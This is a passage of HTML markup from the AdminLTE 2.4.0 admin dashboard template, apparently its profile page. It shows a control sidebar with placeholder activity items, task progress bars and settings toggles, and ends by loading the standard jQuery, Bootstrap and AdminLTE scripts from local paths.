844:                     <div class="col-sm-offset-2 col-sm-10">
845:                       <div class="checkbox">
846:                         <label>
847:                           <input type="checkbox"> I agree to the <a href="#">terms and conditions</a>
848:                         </label>
849:                       </div>
850:                     </div>
851:                   </div>
852:                   <div class="form-group">
853:                     <div class="col-sm-offset-2 col-sm-10">
854:                       <button type="submit" class="btn btn-danger">Submit</button>
855:                     </div>
856:                   </div>
857:                 </form>
858:               </div>
859:               <!-- /.tab-pane -->
860:             </div>
861:             <!-- /.tab-content -->
862:           </div>
863:           <!-- /.nav-tabs-custom -->
864:         </div>
865:         <!-- /.col -->
866:       </div>
867:       <!-- /.row -->
868:
869:     </section>
870:     <!-- /.content -->
871:   </div>
872:   <!-- /.content-wrapper -->
873:   <footer class="main-footer">
874:     <div class="pull-right hidden-xs">
875:       <b>Version</b> 2.4.0
876:     </div>
877:     <strong>Copyright &copy; 2014-2016 <a href="https://adminlte.io">Almsaeed Studio</a>.</strong> All rights
878:     reserved.
879:   </footer>
880:
881:   <!-- Control Sidebar -->
882:   <aside class="control-sidebar control-sidebar-dark">
883:     <!-- Create the tabs -->
884:     <ul class="nav nav-tabs nav-justified control-sidebar-tabs">
885:       <li><a href="#control-sidebar-home-tab" data-toggle="tab"><i class="fa fa-home"></i></a></li>
886:       <li><a href="#control-sidebar-settings-tab" data-toggle="tab"><i class="fa fa-gears"></i></a></li>
887:     </ul>
888:     <!-- Tab panes -->
889:     <div class="tab-content">
890:       <!-- Home tab content -->
891:       <div class="tab-pane" id="control-sidebar-home-tab">
892:         <h3 class="control-sidebar-heading">Recent Activity</h3>
893:         <ul class="control-sidebar-menu">
894:           <li>
895:             <a href="javascript:void(0)">
896:               <i class="menu-icon fa fa-birthday-cake bg-red"></i>
897:
898:               <div class="menu-info">
899:                 <h4 class="control-sidebar-subheading">Langdon's Birthday</h4>
900:
901:                 <p>Will be 23 on April 24th</p>
902:               </div>
903:             </a>
904:           </li>
905:           <li>
906:             <a href="javascript:void(0)">
907:               <i class="menu-icon fa fa-user bg-yellow"></i>
908:
909:               <div class="menu-info">
910:                 <h4 class="control-sidebar-subheading">Frodo Updated His Profile</h4>
911:
912:                 <p>New phone +1(800)555-1234</p>
913:               </div>
914:             </a>
915:           </li>
916:           <li>
917:             <a href="javascript:void(0)">
918:               <i class="menu-icon fa fa-envelope-o bg-light-blue"></i>
919:
920:               <div class="menu-info">
921:                 <h4 class="control-sidebar-subheading">Nora Joined Mailing List</h4>
922:
923:                 <p>nora@example.com</p>
924:               </div>
925:             </a>
926:           </li>
927:           <li>
928:             <a href="javascript:void(0)">
929:               <i class="menu-icon fa fa-file-code-o bg-green"></i>
930:
931:               <div class="menu-info">
932:                 <h4 class="control-sidebar-subheading">Cron Job 254 Executed</h4>
933:
934:                 <p>Execution time 5 seconds</p>
935:               </div>
936:             </a>
937:           </li>
938:         </ul>
939:         <!-- /.control-sidebar-menu -->
940:
941:         <h3 class="control-sidebar-heading">Tasks Progress</h3>
942:         <ul class="control-sidebar-menu">
943:           <li>
944:             <a href="javascript:void(0)">
945:               <h4 class="control-sidebar-subheading">
946:                 Custom Template Design
947:                 <span class="label label-danger pull-right">70%</span>
948:               </h4>
949:
950:               <div class="progress progress-xxs">
951:                 <div class="progress-bar progress-bar-danger" style="width: 70%"></div>
952:               </div>
953:             </a>
954:           </li>
955:           <li>
956:             <a href="javascript:void(0)">
957:               <h4 class="control-sidebar-subheading">
958:                 Update Resume
959:                 <span class="label label-success pull-right">95%</span>
960:               </h4>
961:
962:               <div class="progress progress-xxs">
963:                 <div class="progress-bar progress-bar-success" style="width: 95%"></div>
964:               </div>
965:             </a>
966:           </li>
967:           <li>
968:             <a href="javascript:void(0)">
969:               <h4 class="control-sidebar-subheading">
970:                 Laravel Integration
971:                 <span class="label label-warning pull-right">50%</span>
972:               </h4>
973:
974:               <div class="progress progress-xxs">
975:                 <div class="progress-bar progress-bar-warning" style="width: 50%"></div>
976:               </div>
977:             </a>
978:           </li>
979:           <li>
980:             <a href="javascript:void(0)">
981:               <h4 class="control-sidebar-subheading">
982:                 Back End Framework
983:                 <span class="label label-primary pull-right">68%</span>
984:               </h4>
985:
986:               <div class="progress progress-xxs">
987:                 <div class="progress-bar progress-bar-primary" style="width: 68%"></div>
988:               </div>
989:             </a>
990:           </li>
991:         </ul>
992:         <!-- /.control-sidebar-menu -->
993:
994:       </div>
995:       <!-- /.tab-pane -->
996:       <!-- Stats tab content -->
997:       <div class="tab-pane" id="control-sidebar-stats-tab">Stats Tab Content</div>
998:       <!-- /.tab-pane -->
999:       <!-- Settings tab content -->
000:       <div class="tab-pane" id="control-sidebar-settings-tab">
001:         <form method="post">
002:           <h3 class="control-sidebar-heading">General Settings</h3>
003:
004:           <div class="form-group">
005:             <label class="control-sidebar-subheading">
006:               Report panel usage
007:               <input type="checkbox" class="pull-right" checked>
008:             </label>
009:
010:             <p>
011:               Some information about this general settings option
012:             </p>
013:           </div>
014:           <!-- /.form-group -->
015:
016:           <div class="form-group">
017:             <label class="control-sidebar-subheading">
018:               Allow mail redirect
019:               <input type="checkbox" class="pull-right" checked>
020:             </label>
021:
022:             <p>
023:               Other sets of options are available
024:             </p>
025:           </div>
026:           <!-- /.form-group -->
027:
028:           <div class="form-group">
029:             <label class="control-sidebar-subheading">
030:               Expose author name in posts
031:               <input type="checkbox" class="pull-right" checked>
032:             </label>
033:
034:             <p>
035:               Allow the user to show his name in blog posts
036:             </p>
037:           </div>
038:           <!-- /.form-group -->
039:
040:           <h3 class="control-sidebar-heading">Chat Settings</h3>
041:
042:           <div class="form-group">
043:             <label class="control-sidebar-subheading">
044:               Show me as online
045:               <input type="checkbox" class="pull-right" checked>
046:             </label>
047:           </div>
048:           <!-- /.form-group -->
049:
050:           <div class="form-group">
051:             <label class="control-sidebar-subheading">
052:               Turn off notifications
053:               <input type="checkbox" class="pull-right">
054:             </label>
055:           </div>
056:           <!-- /.form-group -->
057:
058:           <div class="form-group">
059:             <label class="control-sidebar-subheading">
060:               Delete chat history
061:               <a href="javascript:void(0)" class="text-red pull-right"><i class="fa fa-trash-o"></i></a>
062:             </label>
063:           </div>
064:           <!-- /.form-group -->
065:         </form>
066:       </div>
067:       <!-- /.tab-pane -->
068:     </div>
069:   </aside>
070:   <!-- /.control-sidebar -->
071:   <!-- Add the sidebar's background. This div must be placed
072:        immediately after the control sidebar -->

073:   <div class="control-sidebar-bg"></div>
074: </div>
075: <!-- ./wrapper -->
076:
077: <!-- jQuery 3.1.1 -->
078: <script src="../../plugins/jQuery/jquery-3.1.1.min.js"></script>
079: <!-- Bootstrap 3.3.7 -->
080: <script src="../../bootstrap/js/bootstrap.min.js"></script>
081: <!-- FastClick -->
082: <script src="../../plugins/fastclick/fastclick.js"></script>
083: <!-- AdminLTE App -->
084: <script src="../../dist/js/adminlte.min.js"></script>
085: <!-- AdminLTE for demo purposes -->
086: <script src="../../dist/js/demo.js"></script>
087: </body>
088: </html>
089:
090:
091: